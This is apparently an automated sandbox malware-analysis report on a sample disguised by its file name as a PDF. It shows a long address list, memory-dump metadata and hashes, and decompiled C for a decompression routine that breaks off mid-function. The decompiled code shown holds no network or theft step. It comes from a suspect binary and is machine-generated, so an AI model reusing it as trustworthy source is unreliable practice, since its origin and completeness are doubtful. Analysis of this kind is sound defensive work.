                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x00000000
                                                                      0x00407004
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406fc8
                                                                      0x00406fc2
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407066
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x00407098
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00407175
                                                                      0x00406fc2
                                                                      0x00406f49
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406b7d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                                      • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                                      • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                                      • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406C97() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
